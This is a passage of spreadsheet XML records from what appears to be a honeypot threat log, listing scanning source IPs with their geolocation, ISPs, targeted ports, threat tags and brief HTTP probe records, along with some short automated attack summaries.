    <s v="residential"/>
    <s v="Telecommunication Company of Esfahan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25ff:d5ed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="890"/>
    <x v="890"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T21:23:02"/>
    <d v="2023-11-25T11:36:58"/>
    <d v="2025-04-24T21:23:02"/>
    <n v="127"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H32&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="22&amp;&amp;33888&amp;&amp;6631&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="OD"/>
    <s v="Odisha"/>
    <s v="Khordha"/>
    <s v="Bhubaneswar (Arya Vihar Colony)"/>
    <s v="1275817"/>
    <s v="751009"/>
    <s v="20.3315"/>
    <s v="85.8145"/>
    <s v="136376"/>
    <s v="Udayatel Communications Private Limited"/>
    <s v="Udayatel Communications Private Limited"/>
    <s v="business"/>
    <s v="Udayatel Communications Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6763:1143"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="891"/>
    <x v="891"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T20:55:06"/>
    <d v="2024-04-09T10:00:00"/>
    <d v="2025-04-24T20:55:06"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="37844&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="26"/>
    <s v="Busan"/>
    <s v="Dongnae-gu"/>
    <s v="Dongnae (Jeonpo-daero)"/>
    <s v="1834203"/>
    <s v="NA"/>
    <s v="35.1543"/>
    <s v="129.065"/>
    <s v="9845"/>
    <s v="LG HelloVision Corp."/>
    <s v="LG HelloVision Corp."/>
    <s v="business"/>
    <s v="HVJungbusan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e2c:f0c8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The log data is empty, indicating there are currently no recorded malicious activities."/>
    <s v="I'll need some log data to analyze. Please provide the actual log data for me to work with._x000a__x000a_Once you provide the log data, I can help you identify the type of attack and give a short phrase describing it (max 2 words)."/>
  </r>
  <r>
    <x v="892"/>
    <x v="892"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T20:50:42"/>
    <d v="2025-03-05T12:09:09"/>
    <d v="2025-04-24T20:50:42"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Kukatpally"/>
    <s v="1265767"/>
    <s v="NA"/>
    <s v="17.4849"/>
    <s v="78.4138"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312b:e290"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="893"/>
    <x v="893"/>
    <s v="85-70-45-159.rcd.o2.cz"/>
    <x v="0"/>
    <d v="2025-04-24T20:18:52"/>
    <d v="2025-04-11T10:53:20"/>
    <d v="2025-04-24T20:18:52"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_HC1"/>
    <s v="443&amp;&amp;8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="10"/>
    <s v="Prague"/>
    <s v="Praha 4"/>
    <s v="Prague (Praha 4)"/>
    <s v="3067696"/>
    <s v="140 00"/>
    <s v="50.0465"/>
    <s v="14.4565"/>
    <s v="5610"/>
    <s v="O2 Czech Republic, a.s."/>
    <s v="O2 Czech Republic, a.s."/>
    <s v="residential"/>
    <s v="CZ.CZNET"/>
    <s v="2004-11-02"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '95.164.21.98', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5546:2d9f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="894"/>
    <x v="894"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T19:39:43"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-24T19:39:43"/>
    <n v="116"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H23&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8161&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2004-03-15"/>
    <s v="ASIANET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,52213)}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,60484)}&amp;&amp;{Data_SMB:Incoming connection (202.83.54.193,60871)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca53:36c1"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="895"/>
    <x v="895"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T19:10:07"/>
    <d v="2025-03-23T01:37:29"/>
    <d v="2025-04-24T19:10:07"/>
    <n v="89"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H19"/>
    <s v="5900&amp;&amp;14894&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Dnipro rural raion"/>
    <s v="Dnipro"/>
    <s v="709930"/>
    <s v="NA"/>
    <s v="48.4647"/>
    <s v="35.0462"/>
    <s v="48693"/>
    <s v="Rices Privately owned enterprise"/>
    <s v="Rices Privately owned enterprise"/>
    <s v="business"/>
    <s v="Rices Privately owned enterprise"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f3:6069"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="896"/>
    <x v="896"/>
    <s v="vmi1084073.contaboserver.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-24T19:08:11"/>
    <d v="2024-12-29T17:32:27"/>
    <d v="2025-04-24T19:08:11"/>
    <n v="6639"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;62193&amp;&amp;59651&amp;&amp;55690&amp;&amp;53643&amp;&amp;57826&amp;&amp;65057&amp;&amp;54114&amp;&amp;53512&amp;&amp;54901"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NW"/>
    <s v="North Rhine-Westphalia"/>
    <s v="Düsseldorf District"/>
    <s v="Düsseldorf"/>
    <s v="2934246"/>
    <s v="40213"/>
    <s v="51.2277"/>
    <s v="6.77346"/>
    <s v="51167"/>
    <s v="Contabo GmbH"/>
    <s v="Casablanca INT fraction"/>
    <s v="hosting"/>
    <s v="Casablanca INT"/>
    <s v="2003-09-16"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2017-03-05 07:28:42"/>
    <s v="2026-03-05 07:28:42"/>
    <s v="2025-03-06 08:06:31"/>
    <s v="['NS1.CONTABO.NET', 'NS2.CONTABO.NET', 'NS3.CONTABO.NET']"/>
    <s v="RegistryGate GmbH"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="17"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:52d0:15c2"/>
    <s v="C-I_D"/>
    <s v="medium"/>
    <s v="Low"/>
    <s v="The attacker is scanning for available services and vulnerabilities, potentially identifying potential entry points into the network. They are also attempting to exploit these vulnerabilities by sending malicious requests. &amp;&amp; The attacker is attempting to scan and map the network, gathering information about available services and devices. They are also trying to exploit vulnerabilities in various protocols, such as FTP, HTTP, HTTPS, and others, by sending malicious requests and probes."/>
    <s v="Port scanning and exploitation attempts.  &amp;&amp; Port scanning, exploiting known vulnerabilities"/>
  </r>
  <r>
    <x v="897"/>
    <x v="897"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T19:02:20"/>
    <d v="2024-07-10T23:08:00"/>
    <d v="2025-04-24T19:02:20"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="22&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70b8:b1e4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="898"/>
    <x v="898"/>
    <s v="220-134-49-57.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-24T18:32:57"/>
    <d v="2024-01-05T08:17:00"/>
    <d v="2025-04-24T18:32:57"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="64866&amp;&amp;23&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:3139"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="899"/>
    <x v="899"/>
    <s v="NA&amp;&amp;ca-san-us-gd17-wk102b.internet-census.org"/>
    <x v="0"/>
    <d v="2025-04-24T18:11:27"/>
    <d v="2024-02-07T16:36:00"/>
    <d v="2025-04-24T18:11:27"/>
    <n v="376"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTP_H20&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTPS_H43&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_HTTPS_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;20041&amp;&amp;8443&amp;&amp;21525&amp;&amp;NA&amp;&amp;55883&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="NA"/>
    <s v="New York"/>
    <s v="5128581"/>
    <s v="10123"/>
    <s v="40.7128"/>
    <s v="-74.006"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="ICG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.90.63.129', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.8.69', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '203.29.241.98', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) 